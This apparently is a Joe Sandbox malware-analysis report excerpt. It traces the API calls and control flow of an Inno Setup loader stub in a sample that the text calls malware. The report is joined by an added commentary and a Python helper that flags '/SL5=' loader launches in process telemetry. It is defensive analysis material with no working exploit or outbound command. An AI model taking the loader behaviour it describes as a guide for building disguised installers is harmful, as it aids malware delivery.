calls 6601->6602 6603 40721b 6602->6603 6604 407221 6603->6604 6605 40722f 6603->6605 6606 40322c 4 API calls 6604->6606 6608 40724b 6605->6608 6609 40723f 6605->6609 6607 40722d 6606->6607 6607->6591 6619 4032b8 6608->6619 6612 4071d0 6609->6612 6613 40322c 4 API calls 6612->6613 6614 4071df 6613->6614 6615 4071fc 6614->6615 6616 406950 CharPrevA 6614->6616 6615->6607 6617 4071eb 6616->6617 6617->6615 6618 4032fc 18 API calls 6617->6618 6618->6615 6620 403278 18 API calls 6619->6620 6621 4032c2 6620->6621 6621->6607 6622 403a97 6623 403aac 6622->6623 6624 403bbc GetStdHandle 6623->6624 6625 403b0e CreateFileA 6623->6625 6626 403ab2 6623->6626 6627 403c17 GetLastError 6624->6627 6639 403bba 6624->6639 6625->6627 6628 403b2c 6625->6628 6627->6626 6630 403b3b GetFileSize 6628->6630 6628->6639 6630->6627 6632 403b4e SetFilePointer 6630->6632 6631 403be7 GetFileType 6631->6626 6634 403c02 CloseHandle 6631->6634 6632->6627 6635 403b6a ReadFile 6632->6635 6634->6626 6635->6627 6636 403b8c 6635->6636 6637 403b9f SetFilePointer 6636->6637 6636->6639 6637->6627 6638 403bb0 SetEndOfFile 6637->6638 6638->6627 6638->6639 6639->6626 6639->6631 6644 40aaa2 6645 40aad2 6644->6645 6646 40aadc CreateWindowExA SetWindowLongA 6645->6646 6647 405194 33 API calls 6646->6647 6648 40ab5f 6647->6648 6649 4032fc 18 API calls 6648->6649 6650 40ab6d 6649->6650 6651 4032fc 18 API calls 6650->6651 6652 40ab7a 6651->6652 6653 406b7c 19 API calls 6652->6653 6654 40ab86 6653->6654 6655 4032fc 18 API calls 6654->6655 6656 40ab8f 6655->6656 6657 4099ec 43 API calls 6656->6657 6658 40aba1 6657->6658 6659 4098cc 19 API calls 6658->6659 6660 40abb4 6658->6660 6659->6660 6661 40abed 6660->6661 6662 4094d8 9 API calls 6660->6662 6663 40ac06 6661->6663 6666 40ac00 RemoveDirectoryA 6661->6666 6662->6661 6664 40ac1a 6663->6664 6665 40ac0f DestroyWindow 6663->6665 6667 40ac42 6664->6667 6668 40357c 4 API calls 6664->6668 6665->6664 6666->6663 6669 40ac38 6668->6669 6670 4025ac 4 API calls 6669->6670 

Control-flow Graph
APIs
• GetSystemInfo.KERNEL32(?), ref: 00409B8A
• VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
• VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
• VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
• VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Virtual$ProtectQuery$InfoSystem
• String ID:
• API String ID: 2441996862-0
• Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
• Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
• Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
• Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
• Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
• Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
• Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
• GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
• GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
• SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AddressProc$HandleModulePolicyProcess
• String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
• API String ID: 3256987805-3653653586
• Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
• Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
• Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
• Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• SetLastError.KERNEL32 ref: 0040AAC1
  • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02010470), ref: 0040966C
• CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
• SetWindowLongA.USER32(0004043A,000000FC,00409960), ref: 0040AB15
• RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
• DestroyWindow.USER32(0004043A,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
• String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
• API String ID: 3757039580-3001827809
• Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
• Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
• Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
• Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
• API String ID: 1646373207-2130885113
• Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
• Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
• Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
• Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                                                            • SetWindowLongA.USER32(0004043A,000000FC,00409960), ref: 0040AB15
                                                                                                                              • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                                                              • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02010470,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                                              • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02010470,00409AD8,00000000), ref: 00409A70
                                                                                                                              • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                                              • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                                              • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02010470,00409AD8), ref: 00409AA4
                                                                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                                                            • DestroyWindow.USER32(0004043A,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                                            • API String ID: 3586484885-3001827809
                                                                                                                            • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                                            • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                                                                                            • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                                            • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%
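                                                                                                                            The function above is the Inno Setup loader stub (SetupLdr): it creates a hidden STATIC window named InnoSetupLdrWindow, spawns the extracted installer with CreateProcessA, pumps messages in MsgWaitForMultipleObjects until the child exits, reads the exit code with GetExitCodeProcess, then removes its temporary directory (RemoveDirectoryA) and destroys the window. The string table shows how the child's command line is built: the literal /SL5=" followed by the format %x,%d,%d, (window handle in hex, two decimal offsets) and the original executable path. The CreateDirectoryA/GetLastError function further down, with its ".tmp" string, is the matching step that creates that temporary directory. The helper below is an added example, not code from the report or from Inno Setup; it parses process-creation telemetry for this launch pattern. It assumes the documented Inno Setup form /SL5="$HWND,offset0,offset1,path" and the is-XXXXX.tmp temp-directory naming that Inno Setup uses (only the bare ".tmp" suffix appears in the report's strings). The log records are constructed for the example; the handle value 4043A mirrors the CreateWindowExA return value seen in the API list.

```python
"""Triage helper for Inno Setup loader (SetupLdr) launches in process telemetry.

Added example, not part of the Joe Sandbox report and not Inno Setup's own code.
Assumption: the loader starts the extracted installer with
    /SL5="$<hwnd hex>,<offset0>,<offset1>,<original exe path>"
(the report's string table shows the pieces '/SL5="' and '%x,%d,%d,').
"""
import re
from dataclasses import dataclass
from typing import Optional, Tuple, List

# Constructed sample telemetry (not taken from the report): one loader launch, one benign process.
SAMPLE_EVENTS = [
    {
        "parent_image": r"C:\Users\user\Desktop\file.exe",
        "image": r"C:\Users\user\AppData\Local\Temp\is-ABC12.tmp\file.tmp",
        "command_line": r'"C:\Users\user\AppData\Local\Temp\is-ABC12.tmp\file.tmp" '
                        r'/SL5="$4043A,123456,78910,C:\Users\user\Desktop\file.exe" ',
    },
    {
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Program Files\Tool\tool.exe",
        "command_line": r'"C:\Program Files\Tool\tool.exe" /verbose',
    },
]

# /SL5="$<hex hwnd>,<dec offset0>,<dec offset1>,<path>"
SL5_RE = re.compile(r'/SL5="\$([0-9A-Fa-f]+),(\d+),(\d+),([^"]*)"')

# Assumed Inno Setup layout: {tmp}\is-XXXXX.tmp\<name>.tmp (five alphanumerics).
INNO_TMP_RE = re.compile(r'\\is-[A-Za-z0-9]{5}\.tmp\\[^\\]+\.tmp$', re.IGNORECASE)


@dataclass
class InnoLoaderLaunch:
    hwnd: int            # loader's hidden window handle (class STATIC, name InnoSetupLdrWindow)
    offset0: int
    offset1: int
    original_exe: str    # path of the outer executable that carries the payload
    child_image: str     # the extracted installer that was spawned
    from_temp_dir: bool  # child lives in an is-XXXXX.tmp directory


def parse_sl5(command_line: str) -> Optional[Tuple[int, int, int, str]]:
    """Return (hwnd, offset0, offset1, original_exe) or None if no /SL5= switch is present."""
    m = SL5_RE.search(command_line)
    if m is None:
        return None
    return int(m.group(1), 16), int(m.group(2)), int(m.group(3)), m.group(4)


def is_inno_temp_child(image_path: str) -> bool:
    """True when the image path follows the assumed Inno Setup temp-directory layout."""
    return INNO_TMP_RE.search(image_path) is not None


def triage(event: dict) -> Optional[InnoLoaderLaunch]:
    """Classify one process-creation record; None when it is not a SetupLdr-style launch."""
    parsed = parse_sl5(event["command_line"])
    if parsed is None:
        return None
    hwnd, off0, off1, original = parsed
    return InnoLoaderLaunch(hwnd, off0, off1, original,
                            event["image"], is_inno_temp_child(event["image"]))


def triage_events(events: List[dict]) -> List[InnoLoaderLaunch]:
    """Run triage over a batch of records and keep only the loader launches."""
    return [hit for hit in (triage(e) for e in events) if hit is not None]


if __name__ == "__main__":
    for hit in triage_events(SAMPLE_EVENTS):
        print(f"SetupLdr launch: hwnd=0x{hit.hwnd:X} offsets=({hit.offset0},{hit.offset1}) "
              f"payload={hit.original_exe} child={hit.child_image} temp_dir={hit.from_temp_dir}")
```

The offsets are where the loader tells the child to find its own data inside the original executable, so original_exe is the file worth pulling for static analysis, while child_image is the file that will actually run the installer logic (and, in this sample, the malware). A legitimate Inno Setup installer produces the same launch shape, so this identifies the packer, not the verdict; the parent image and what the child does next decide that.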

                                                                                                                            APIs
                                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02010470,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02010470,00409AD8,00000000), ref: 00409A70
                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                                            • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02010470,00409AD8), ref: 00409AA4
                                                                                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02010470), ref: 0040966C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                                                            • String ID: D
                                                                                                                            • API String ID: 3356880605-2746444292
                                                                                                                            • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                                            • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                                                            • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                                            • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph (basic blocks and edges, transcribed from the graph image)
                                                                                                                            • 136  401918-40193a  RtlInitializeCriticalSection   -> 137, 138
                                                                                                                            • 138  40193c-401941  RtlEnterCriticalSection        -> 137
                                                                                                                            • 137  401946-40197c  call 4012dc (x3), LocalAlloc   -> 145, 146
                                                                                                                            • 146  40197e                                        -> 147
                                                                                                                            • 147  401983-401995  (self-loop)                    -> 147, 149
                                                                                                                            • 149  401997-4019a6                                 -> 145
                                                                                                                            • 145  4019ad-4019c1                                 -> 150, 151
                                                                                                                            • 150  4019c3-4019c8  RtlLeaveCriticalSection        -> 151
                                                                                                                            • 151  4019cd                                        (exit)
                                                                                                                            APIs
                                                                                                                            • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 730355536-0
                                                                                                                            • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                                            • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                                                            • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                                            • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message
                                                                                                                            • String ID: .tmp$y@
                                                                                                                            • API String ID: 2030045667-2396523267
                                                                                                                            • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                                            • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                                                            • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                                            • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message
                                                                                                                            • String ID: .tmp$y@
                                                                                                                            • API String ID: 2030045667-2396523267
                                                                                                                            • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                                            • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                                                            • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                                            • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                            • String ID: .tmp
                                                                                                                            • API String ID: 1375471231-2986845003
                                                                                                                            • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                                            • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                                                                                            • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                                            • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph (graph image not reproduced; summary of its node list)
                                                                                                                            • Basic blocks numbered 342-407 covering 4076dc-407917; entry block 342 (407749-40774a).
                                                                                                                            • API-calling blocks: 343 (4076dc-4076e6) WriteFile, whose two successors are 346 (4076e8-4076ea, call 40748c) and 347 (4076ef-4076f2), the latter reaching 352 (4076f4-4076fb, call 4073ec); 363 (4078d6-4078eb) call 407890 followed by InterlockedExchange.
                                                                                                                            APIs
                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
• Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
• Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
• Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B
Uniqueness
Uniqueness Score: -1.00%

